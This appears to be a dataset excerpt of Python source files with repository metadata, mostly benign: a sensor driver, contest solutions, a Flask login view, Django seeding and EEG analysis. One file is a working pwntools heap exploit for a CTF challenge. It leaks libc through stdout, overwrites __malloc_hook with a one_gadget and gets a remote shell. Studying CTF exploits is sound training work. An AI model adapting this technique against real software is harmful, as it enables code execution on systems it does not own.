| column | type | values / range |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–288 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64, nullable | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us], nullable | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us], nullable | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |
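The rows below are listed cell by cell in the column order above, with the `content` cell holding the full source file. As a minimal sketch of how a split with this schema could be consumed, assuming it is published on the Hugging Face Hub (the dataset id `org/python-files-subset`, the split name, and the filter thresholds are placeholders, not the real identifiers of this data):

```python
# Minimal sketch, not the official loader: stream rows with the schema above
# and keep small, human-written, permissively licensed Python files.
# "org/python-files-subset" is a hypothetical dataset id.
from datasets import load_dataset

ds = load_dataset("org/python-files-subset", split="train", streaming=True)

for row in ds:
    if row["is_vendor"] or row["is_generated"]:
        continue  # skip vendored and auto-generated files
    if row["length_bytes"] <= 4096 and row["license_type"] == "permissive":
        print(row["repo_name"], row["path"], row["length_bytes"], "bytes")
```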
0080d6e109e103ff474bb678c4ce0d6365a10f90
|
0b2ae73bd91d843deb193d79b7c4eb02e900e851
|
/ADT75.py
|
b3bb7d6f5b3c37d352bc8f837b284d4d87f64082
|
[] |
no_license
|
ncdcommunity/Raspberry_pi_ADT75_Temperature_Sensor_Python_Library
|
c495d8db53f3d87585ab8a3eac883ede5dcd5bb4
|
e42bad0d5e057cf309d06b69b44b62ad4cca1da1
|
refs/heads/master
| 2021-09-05T15:16:24.670890
| 2018-01-29T07:03:01
| 2018-01-29T07:03:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,064
|
py
|
# Distributed with a free-will license.
# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.
# ADT75
# This code is designed to work with the ADT75_I2CS I2C Mini Module available from ControlEverything.com.
# https://www.controleverything.com/content/Temperature?sku=ADT75_I2CS#tabs-0-product_tabset-2
import smbus
import time
# Get I2C bus
bus = smbus.SMBus(1)
# I2C Address of the device
ADT75_DEFAULT_ADDRESS = 0x48
# ADT75 Register Map
ADT75_REG_TEMP = 0x00 # Temperature Value
ADT75_REG_CONFIG = 0x01 # Configuration Register
ADT75_REG_THYST = 0x02 # THYST setpoint
ADT75_REG_TOS = 0x03 # TOS setpoint
# ADT75 Configuration Register
ADT75_MODE_NORMAL = 0x00 # Normal Mode
ADT75_MODE_ONESHOT = 0x20 # One-Shot Mode
ADT75_FAULTQUEUE_1 = 0x00 # Fault Queue = 1
ADT75_FAULTQUEUE_2 = 0x08 # Fault Queue = 2
ADT75_FAULTQUEUE_4 = 0x10 # Fault Queue = 4
ADT75_FAULTQUEUE_6 = 0x18 # Fault Queue = 6
ADT75_MODE_CMP = 0x00 # Comparater Mode
ADT75_MODE_INT = 0x02 # Interrupt Mode
ADT75_MODE_SHUTDOWN = 0x01 # Shutdown Mode
class ADT75():
def __init__(self):
self.temp_configuration()
def temp_configuration(self):
"""Select the temperature configuration from the given provided values"""
TEMP_CONFIG = (ADT75_MODE_NORMAL | ADT75_FAULTQUEUE_1 | ADT75_MODE_CMP)
bus.write_byte_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_CONFIG, TEMP_CONFIG)
def read_temp(self):
"""Read data back from ADT75_REG_TEMP(0x00), 2 bytes, temp MSB, temp LSB"""
data = bus.read_i2c_block_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_TEMP, 2)
# Convert the data to 12-bits
temp = ((data[0] * 256) + data[1]) / 16
if temp > 2047 :
temp -= 4096
cTemp = temp * 0.0625
fTemp = (cTemp * 1.8) + 32
return {'c' : cTemp, 'f' : fTemp}
from ADT75 import ADT75
adt75 = ADT75()
while True:
temp = adt75.read_temp()
print "Temperature in Celsius : %.2f C"%(temp['c'])
print "Temperature in Fahrenheit : %.2f F"%(temp['f'])
print " ***************************************** "
time.sleep(1)
|
[
"ryker1990@gmail.com"
] |
ryker1990@gmail.com
|
e05e44ea2d5ee7d245bc918ab507c0a29739aaae
|
8692807f1dfa8c18c61df07cfafbbd27d4e66fba
|
/LONG-CHALLENGE/PROXYC.sol.py
|
cead1b911458e67e7b124171a7ef3ddec767cfb8
|
[] |
no_license
|
sharmakajal0/codechef_problems
|
00381e9bf1996b859e46f087c2ffafd9d7a10ef1
|
0b979029e0a821f47fbdd6f9c624daee785a02e7
|
refs/heads/master
| 2020-05-29T15:04:40.459979
| 2020-03-29T08:44:53
| 2020-03-29T08:44:53
| 189,212,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
#!/usr/bin/env python
# CodeChef PROXYC: find the minimum number of absences that must be covered by
# a proxy so that attendance reaches at least 75%, or report -1 if impossible.
for _ in range(int(input())):
    D = int(input())
    S = input()
    P = S.count('P')
    need = -(-3 * D // 4)  # ceil(0.75 * D) attended days required
    if P >= need:
        print(0)
        continue
    # An 'A' on day d (0-indexed, excluding the first two and last two days)
    # can be covered by a proxy when there is a 'P' on day d-1 or d-2 and a
    # 'P' on day d+1 or d+2.
    convertible = 0
    for d in range(2, D - 2):
        if S[d] == 'A' and 'P' in (S[d - 1], S[d - 2]) and 'P' in (S[d + 1], S[d + 2]):
            convertible += 1
    missing = need - P
    print(missing if convertible >= missing else -1)
|
[
"sharma.kajal.sitm@gmail.com"
] |
sharma.kajal.sitm@gmail.com
|
c339f9eb2a18aa108c8f03d0636db2b68a387b05
|
487aab917a808b30ebeccf90cd15ed59ac9d776b
|
/Server/app/views/account/auth.py
|
00563a701cf1bf96abd6f713b7d59feb79dee4b7
|
[] |
no_license
|
DSM-DMS/DMS-OpenAPI-Backend
|
62fffc913b5cb562fbca3333223f8abfb2cf2a8a
|
1f0c434e98c4cc5d2150af6f533109b1797d8659
|
refs/heads/master
| 2020-03-20T19:48:56.576943
| 2018-06-18T06:45:05
| 2018-06-18T06:45:05
| 137,655,168
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
from flask import Blueprint, Response, request
from flask_jwt_extended import create_access_token, create_refresh_token
from flask_restful import Api
from flasgger import swag_from
from app.docs.account.auth import *
from app.models.account import StudentModel, TokenModel, AccessTokenModel, RefreshTokenModel
from app.views import BaseResource, json_required
api = Api(Blueprint(__name__, __name__))
api.prefix = '/student'
@api.resource('/auth')
class Auth(BaseResource):
@json_required({'id': str, 'password': str})
@swag_from(AUTH_POST)
def post(self):
"""
학생 로그인
"""
payload = request.json
student = StudentModel.objects(id=payload['id'], pw=self.encrypt_password(payload['password'])).first()
return ({
'accessToken': create_access_token(TokenModel.generate_token(AccessTokenModel, student, request.headers['USER-AGENT'])),
'refreshToken': create_refresh_token(TokenModel.generate_token(RefreshTokenModel, student, request.headers['USER-AGENT']))
}, 201) if student else Response('', 401)
|
[
"python@istruly.sexy"
] |
python@istruly.sexy
|
204b4e459a1699224604a3af5706b1de46d495db
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.TZH/Serif_12/pdf_to_json_test_Latn.TZH_Serif_12.py
|
cd6289fc1d1643cc357cf40015e0694b8ed2d3ee
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.TZH/Serif_12/udhr_Latn.TZH_Serif_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
337cee5e29835896cab1957d702d1c6c2b4c4d23
|
7e40c8bb28c2cee8e023751557b90ef7ef518326
|
/de1ctf_2019_weapon/de1ctf_2019_weapon.py
|
b20af85652888221b9c83fe6865667fded000806
|
[] |
no_license
|
1337536723/buuctf_pwn
|
b6e5d65372ed0638a722faef1775026a89321fa3
|
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
|
refs/heads/master
| 2023-08-29T19:35:04.352530
| 2021-11-16T14:06:20
| 2021-11-16T14:06:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,409
|
py
|
from pwn import *
#libc = ELF('libc-2.23.so')
libc = ELF('libc-2.23.buu.so')
def debug(s):
gdb.attach(p, '''
source ~/libc/loadsym.py
loadsym ~/libc/2.23/64/libc-2.23.debug.so
''' + s)
def alloc(index, size, name):
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', str(size).encode())
p.sendlineafter(b'index: ', str(index).encode())
p.sendafter(b'name:', name)
def delete(index):
p.sendlineafter(b'choice >> ', b'2')
p.sendlineafter(b'idx :', str(index).encode())
def edit(index, name):
p.sendlineafter(b'choice >> ', b'3')
p.sendlineafter(b'idx: ', str(index).encode())
p.sendafter(b'content:', name)
def exploit():
alloc(0, 0x20, p64(0) + p64(0x21))
alloc(1, 0x10, b'a')
alloc(2, 0x10, b'a')
#wtf, glibc will check the header of next chunk while free, so we need to write a fake header (0x70, 0x51)
alloc(3, 0x10, p64(0x70) + p64(0x51))
delete(1)
delete(2)
edit(2, b'\x10')
alloc(1, 0x10, b'a')
alloc(1, 0x10, b'a')
alloc(4 ,0x30, b'a')
alloc(5 ,0x30, b'a')
alloc(6, 0x10, b'a')
edit(0, p64(0) + p64(0x71))
delete(1)
edit(0, p64(0) + p64(0x101))
delete(1)
edit(0, p64(0) + p64(0x71))
edit(1, b'\xdd\x75')
alloc(0, 0x60, b'a')
alloc(0, 0x60, b'a')
alloc(6, 0x60, b'a')
payload = b'a' * ( 0x620 - 0x5ed ) + p64(0xfbad1800) + p64(0) * 3 + b'\x00'
edit(0, payload)
p.recvuntil(b'\x7f')
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 131 - libc.sym['_IO_2_1_stdout_']
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
one_gadgets = [0x45206, 0x4525a, 0xef9f4, 0xf0897]
one_gadgets_buu = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one = libc_base + one_gadgets_buu[3]
delete(6)
edit(6, p64(malloc_hook - 0x23))
#context.log_level = 'debug'
alloc(6, 0x60, b'a')
alloc(6, 0x60, b'a' * 0x13 + p64(one))
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', b'1')
p.sendlineafter(b'index: ', b'1')
p.interactive()
if __name__ == '__main__':
flag = False
while not flag:
try:
#p = process('./de1ctf_2019_weapon')
p = remote('node4.buuoj.cn', 25710)
exploit()
flag = True
except:
p.close()
|
[
"admin@srmxy.cn"
] |
admin@srmxy.cn
|
062eb22c54e54134722697966c14311f9e383461
|
daa053212901b51273bb1f8a6ca3eddac2b5cbaf
|
/main/apps/companies/management/commands/seed_consultants.py
|
5df7ab0584e1e6e4412334b82052d2652e8c51ca
|
[] |
no_license
|
truhlik/directit
|
11fb45d482d454b55888f38afe0f64ce533788ad
|
eb10654b64cbe4232811594b936f8e3d0381754e
|
refs/heads/main
| 2023-08-30T10:03:45.376159
| 2021-10-06T19:02:15
| 2021-10-06T19:02:15
| 414,334,714
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,114
|
py
|
import os
import json
from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import transaction
from main.apps.categories.models import Category
from main.apps.companies.models import Company
from main.apps.companies import constants
from main.apps.tags.models import Tag
class Command(BaseCommand):
help = 'Seed Consultants'
# konvertováno pomocí http://beautifytools.com/excel-to-json-converter.php
def handle(self, *args, **options):
path = os.path.join(settings.BASE_DIR, 'seeds', 'consultants2.json')
with open(path, mode='r') as f:
data = json.load(f)
with transaction.atomic():
self.process_data(data)
def process_data(self, data, parent=None):
for konzultant_dct in data['Konzultanti']:
self._create_consultant(konzultant_dct)
def _create_consultant(self, data):
if Company.objects.filter(name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', '')).exists():
return
c = Company(
role=constants.COMPANY_ROLE_CONSULTANT,
name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', ''),
description=data.get('Specifikace', None),
email=data.get('Email', None),
phone=data.get('Telefon', None),
city=data.get('Město', None),
)
c.save()
self.add_tags(c, data.get('Tagy - Technologie', '').split(','))
self.add_tags(c, data.get('Tagy - Kompetence', '').split(','))
def add_tags(self, consultant, data):
tags = []
for tag in data:
t, created = Tag.objects.get_or_create(name=tag.strip())
if t is not None:
tags.append(t)
else:
print(tag)
consultant.tags.add(*tags)
def add_categories(self, consultant, data):
tags = []
for category in data:
t = Category.objects.filter(name=category.strip()).first()
if t is not None:
tags.append(t)
consultant.categories.add(*tags)
|
[
"lubos@endevel.cz"
] |
lubos@endevel.cz
|
0dbd5fdba95bed8a268db8202b3fb87885b024ec
|
7b270cf5f9d0a3e26b5afd758563c6cff73a5248
|
/comportamentais/templateMethod/musica/musica/ordenadores/por_nome.py
|
20811813acfc8389cb954bc7cf5afb90f6bd5ea6
|
[] |
no_license
|
reginaldosantarosa/DesignPatterns
|
10810672d3831e562ec636a5f66bd709c797ca34
|
bec4247f52b8d2e1fe41c570408816a5d4b22608
|
refs/heads/master
| 2020-04-04T06:54:19.757054
| 2018-01-04T03:06:05
| 2018-01-04T03:06:05
| 155,761,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from musica.ordenador import Ordenador
class PorNome(Ordenador):
"""
Ordena as músicas por nome.
"""
def vem_antes(self, musica1, musica2):
"""
Verifica se o nome da musica1 vem antes do nome da musica2
ou se os nomes são iguais
"""
if (musica1.nome >= musica2.nome):
return True
return False
|
[
"victorhad@gmail.com"
] |
victorhad@gmail.com
|
a58aad7520eda26f26eea0cbde53195c6e1f95ff
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-dataplex/samples/generated_samples/dataplex_v1_generated_dataplex_service_list_lake_actions_async.py
|
6bb70e947a1d2da68ce6f3f24464c8d42da2e31a
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ListLakeActions
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dataplex
# [START dataplex_v1_generated_DataplexService_ListLakeActions_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import dataplex_v1
async def sample_list_lake_actions():
# Create a client
client = dataplex_v1.DataplexServiceAsyncClient()
# Initialize request argument(s)
request = dataplex_v1.ListLakeActionsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_lake_actions(request=request)
# Handle the response
async for response in page_result:
print(response)
# [END dataplex_v1_generated_DataplexService_ListLakeActions_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
03d54f61b29f53b93ad2fd757e4e11559959bdce
|
293d7ab59c9e7ff4e1341fb8e6504a89f3384666
|
/python/test/utils/test_graph_converters/test_batch_normalization_self_folding.py
|
1e2d303962a499a835d6efa13a3da5acd8dc33bf
|
[
"Apache-2.0"
] |
permissive
|
CrimsonTuna/nnabla
|
903423b8eb3617c3623952605bcdd77bb5ab2a56
|
36328e574d77f1cc9ee0051f33159a2dc4f03013
|
refs/heads/master
| 2023-03-29T07:12:33.444996
| 2021-04-11T09:33:21
| 2021-04-11T09:33:21
| 356,857,925
| 0
| 0
|
Apache-2.0
| 2021-04-11T13:09:02
| 2021-04-11T12:10:47
| null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
# Copyright (c) 2020 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import pytest
import numpy as np
import nnabla as nn
import nnabla.experimental.graph_converters as GC
from .ref_graphs.resnets import small_cf_resnet, small_bn_self_folding_resnet
batch_size = 1
resnet_ref = small_bn_self_folding_resnet
@pytest.mark.parametrize('seed', [313])
@pytest.mark.parametrize('test', [True])
@pytest.mark.parametrize('graph_ref, graph_act', [(resnet_ref, small_cf_resnet)])
def test_batch_normalization_self_folding(seed, test, graph_ref, graph_act):
from .graph_converter_test_utils import structure_tester, value_tester
# Random number
np.random.seed(seed)
rng = np.random.RandomState(seed)
# Graph
x_data = rng.randn(batch_size, 3, 32, 32)
x = nn.Variable.from_numpy_array(x_data)
y_tgt = graph_act(x, test=test)
# FunctionModifier
modifiers = []
modifiers.append(GC.BatchNormalizationSelfFoldingModifier())
y_act = GC.GraphConverter(modifiers).convert(y_tgt)
# Ref Graph
y_ref = graph_ref(x, name='bn-self-folding-graph-ref')
# Test
structure_tester(y_ref, y_act)
value_tester(y_tgt, y_act, rtol=6e-02, atol=5e-02)
|
[
"Kazuki.Yoshiyama@sony.com"
] |
Kazuki.Yoshiyama@sony.com
|
82bd13fb6585eb7e350d867d90ba5d73d5caf38e
|
5850d0bd221cec491f94cf68a6d880abdb838f0e
|
/tests/exoatlet/spat_decomp.py
|
cbefd3bddcc77909c7648fbe0e25bd9bd3f24412
|
[] |
no_license
|
nickware44/DeepBCI
|
336a437e2a519d09e74f57e692e4c59ac7b1db70
|
96b99b36e888a740dd955b7f6d3f8f05b94efd17
|
refs/heads/master
| 2023-08-03T09:08:20.283055
| 2023-07-27T19:17:13
| 2023-07-27T19:17:13
| 336,832,704
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,260
|
py
|
path_to_nfblab = r'C:\Projects\nfblab\nfb'
import sys
import numpy as np
import pylab as plt
import pandas as pd
import scipy.signal as sg
sys.path.insert(0, path_to_nfblab)
from utils.load_results import load_data
from pynfb.signal_processing.filters import ButterFilter
from pynfb.signal_processing.decompositions import ICADecomposition, CSPDecomposition
from pynfb.inlets.montage import Montage
from mne.viz import plot_topomap
# settings
h5_file = r'C:\Projects\nfblab\nfb\pynfb\results\exoatlet_kolai_stay_go_10-24_15-47-00\experiment_data.h5'
band = (15, 30)
method = 'ica'
np.random.seed(401)
# load data
df, fs, channels, p_names = load_data(h5_file)
fs = int(fs)
eeg_channels = channels[:30]
n_channels = len(eeg_channels)
montage = Montage(eeg_channels)
print('Fs: {}Hz\nAll channels: {}\nEEG channels: {}\nBlock sequence: {}'.format(
fs, ', '.join(channels), ', '.join(eeg_channels), '-'.join(p_names)))
# pre filter
pre_filter = ButterFilter(band, fs, n_channels)
df[eeg_channels] = pre_filter.apply(df[eeg_channels])
df = df.iloc[fs*5:]
# spatial decomposition
if method == 'ica':
decomposition = ICADecomposition(eeg_channels, fs)
elif method == 'csp':
decomposition = CSPDecomposition(eeg_channels, fs)
else:
raise ValueError('Bad method name. Use "ica" or "csp".')
# select data between first and second "pause" block
first_b_number = p_names.index('Pause') + 1
second_b_number = 10000# p_names.index('Pause', 1) + 1
X = df.loc[(df.block_number>first_b_number) & (df.block_number<second_b_number)]
# fit decomposition
decomposition.fit(X[eeg_channels], X.block_name=='Go')
# init axes
n_rows = 5
n_cols = 6
fig, axes = plt.subplots(n_rows, n_cols * 2, figsize=(15, 10))
plt.subplots_adjust(hspace=1)
# sort by erd
erds = np.zeros(n_channels)
erd_band = band # (18, 30)
for k in range(n_channels):
filt = decomposition.filters[:, k]
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > erd_band[0]) & (freq < erd_band[1])
erds[k] = (st_spec[freq_slice].mean() - go_spec[freq_slice].mean()) / st_spec[freq_slice].mean()
# plot axes
for j, k in enumerate(np.argsort(erds)[::-1]):
topo = decomposition.topographies[:, k]
filt = decomposition.filters[:, k]
ax = axes[j // n_cols, j % n_cols * 2]
plot_topomap(topo, montage.get_pos(), axes=ax, show=False, contours=0)
ax.set_title(str(k))
ax.set_xlabel('{:.1f}%'.format(erds[k] * 100))
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > 3) & (freq < 40)
ax = axes[j // n_cols, j % n_cols * 2 + 1]
ax.plot(freq[freq_slice], go_spec[freq_slice])
ax.plot(freq[freq_slice], st_spec[freq_slice])
ax.fill_between(freq[freq_slice], go_spec[freq_slice], st_spec[freq_slice], alpha=0.5)
ax.get_yaxis().set_visible(False)
ax.set_xticks([0, 10, 20, 30, 40])
ax.set_xticklabels([0, 10, 20, 30, 40])
plt.show()
|
[
"n.m.smetanin@gmail.com"
] |
n.m.smetanin@gmail.com
|
cddba55aea5b0e697b0e759fa4236c9772032db5
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/070_oop/007_exceptions/_exercises/templates/GoCongr/002_Exceptions.py
|
558802c1cef142e35946dbce32921cc93b0cf096
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 686
|
py
|
# # -*- coding: utf-8 -*-
#
# # Nested handlers
# ___ # Обрабатываем исключения
# ___ # Вложенный обработчик
# x = 1 / 0 # Ошибка: деление на 0
# ____ N...
# print("Неопределенный идентификатор")
# ____ I...
# print("Несуществующий индекс")
# print("Выражение после вложенного обработчика")
# ____ Z..
# print("Обработка деления на 0")
# x _ 0
# print? # Выведет: 0
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
f572de46bf3442d83632a194c67fbc4ea0587da3
|
9a1dbd1d6dcdb5a4d238fa72ff1eb8e8ac99c9fb
|
/EBookReading/wsgi.py
|
b4b370837d698fee742a9d781becb9f7af5f318b
|
[] |
no_license
|
chintan-27/E-Book-Reading-Website
|
85c0aa7515169f13bb8939aba9ee36bc64af17b8
|
693a75756f9e9b99631bff7973c4da16ed3716a4
|
refs/heads/main
| 2023-08-22T06:04:48.118415
| 2021-09-08T05:37:35
| 2021-09-08T05:37:35
| 378,327,140
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
"""
WSGI config for EBookReading project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'EBookReading.settings')
application = get_wsgi_application()
os.environ["DJANGO_ALLOW_ASYNC_UNSAFE"] = "true"
|
[
"chintan.acharya27@gmail.com"
] |
chintan.acharya27@gmail.com
|
28f6441efdadfc02cdae431872a2d080a5030079
|
f504253210cec1c4ec6c3ea50a45564db7d6cd7f
|
/prettyqt/core/transposeproxymodel.py
|
81174a1c4b71d3ea47ef74b62ff9f018ad7d81d7
|
[
"MIT"
] |
permissive
|
phil65/PrettyQt
|
b1150cb4dce982b9b8d62f38f56694959b720a3e
|
f00500d992d1befb0f2c2ae62fd2a8aafba7fd45
|
refs/heads/master
| 2023-08-30T21:00:08.905444
| 2023-08-17T12:24:45
| 2023-08-17T12:24:45
| 177,451,205
| 17
| 5
|
MIT
| 2020-08-15T22:21:18
| 2019-03-24T18:10:21
|
Python
|
UTF-8
|
Python
| false
| false
| 220
|
py
|
from __future__ import annotations
from prettyqt import core
class TransposeProxyModel(core.AbstractProxyModelMixin, core.QTransposeProxyModel):
"""This proxy transposes the source model."""
ID = "transpose"
|
[
"philipptemminghoff@googlemail.com"
] |
philipptemminghoff@googlemail.com
|
1b71200f5245e6bae920920c97bfa9306e71d00e
|
50aa9303450e06d1172f78c0478a58e5113d9bb9
|
/958palindrome-data-stream.py
|
affb066b625a80be4a626f58e58e577ff236cabd
|
[] |
no_license
|
zlldt/LintCode
|
6e1041b78a301651378833caf7fd7db9ce112ec5
|
e5012161131a8c8557bdb0296980b2a0b712c620
|
refs/heads/master
| 2021-06-27T05:24:08.471072
| 2019-03-02T12:56:26
| 2019-03-02T12:56:26
| 105,424,020
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
class Solution:
"""
@param s: The data stream
@return: Return the judgement stream
"""
def getStream(self, s):
# Write your code here
length = len(s)
result = [1 for x in range(length)]
dict ={}
for i in range(length):
if s[i] in dict:
dict[s[i]] += 1
else:
dict[s[i]] = 1
if len(dict)==1:
result[i] = 1
count = 0
for k,v in dict.items():
if v % 2 == 1:
count += 1
if count>1:
result[i] = 0
return result
|
[
"noreply@github.com"
] |
zlldt.noreply@github.com
|
b8c22bcb6d3ac5f046570154dacdc01b736d759f
|
b420377a638dc9a5d8c09ebc39b0448d47ddb74e
|
/ddd-todolist-sample/todolist/port/eventbus.py
|
5431f4676032719da1a48a8695071bda80b80f8a
|
[] |
no_license
|
shimakaze-git/drf-sample
|
d4e4e8e4d380f0b77e807d4bbf4e3f0d98ee6bcd
|
4294cd5adeea0ef51d3b7eee6a154d23dd089afc
|
refs/heads/master
| 2022-05-02T20:19:09.901257
| 2019-09-15T12:46:51
| 2019-09-15T12:46:51
| 205,698,781
| 0
| 0
| null | 2022-04-22T22:29:32
| 2019-09-01T15:52:14
|
Python
|
UTF-8
|
Python
| false
| false
| 263
|
py
|
from abc import ABCMeta, abstractmethod
class EventBus(metaclass=ABCMeta):
    """ ドメインイベントの通知インタフェース. """
@abstractmethod
def publish(self, event):
""" ドメインイベントを通知する. """
|
[
"shimakaze.soft+github@googlemail.com"
] |
shimakaze.soft+github@googlemail.com
|
527160e77429557933b7824c4d79f4ae526f1411
|
7d949b9f19e4c5c897b3aef76e604f2c0eee7112
|
/src-python/saccade_analysis/tammero_flydradb/report_axis_angle.py
|
88f17a3bd3e549f78714e134fbced84c944473c9
|
[] |
no_license
|
AndreaCensi/saccade_analysis
|
d3fad3a1a406b97c4dcf9cdc82b9b2ce1fbf42df
|
71b87e9225b16317ffa9a581b3c62d8343fe7bfa
|
refs/heads/master
| 2016-09-11T06:49:22.254391
| 2011-12-20T06:39:30
| 2011-12-20T06:39:30
| 952,465
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,889
|
py
|
from contracts import contract
from reprep import Report
import numpy as np
from ..markov import binomial_stats
def create_report_axis_angle(id, desc, saccades):
r = Report('axis_angle')
#
# axis_angle = saccades['axis_angle']
# saccade_angle = saccades['saccade_angle']
stats = statistics_distance_axis_angle(saccades,
num_distance_intervals=10,
axis_angle_bin_interval=10,
axis_angle_bin_size=10
)
f = r.figure(cols=1)
for i, section in enumerate(stats['distance_sections']):
distance_min = section['distance_min']
distance_max = section['distance_max']
prob_left = section['prob_left']
prob_right = section['prob_right']
margin_left = section['margin_left']
margin_right = section['margin_right']
bin_centers = section['bin_centers']
num_saccades = section['num_saccades']
n = len(bin_centers)
with r.data_pylab('section%d' % i) as pylab:
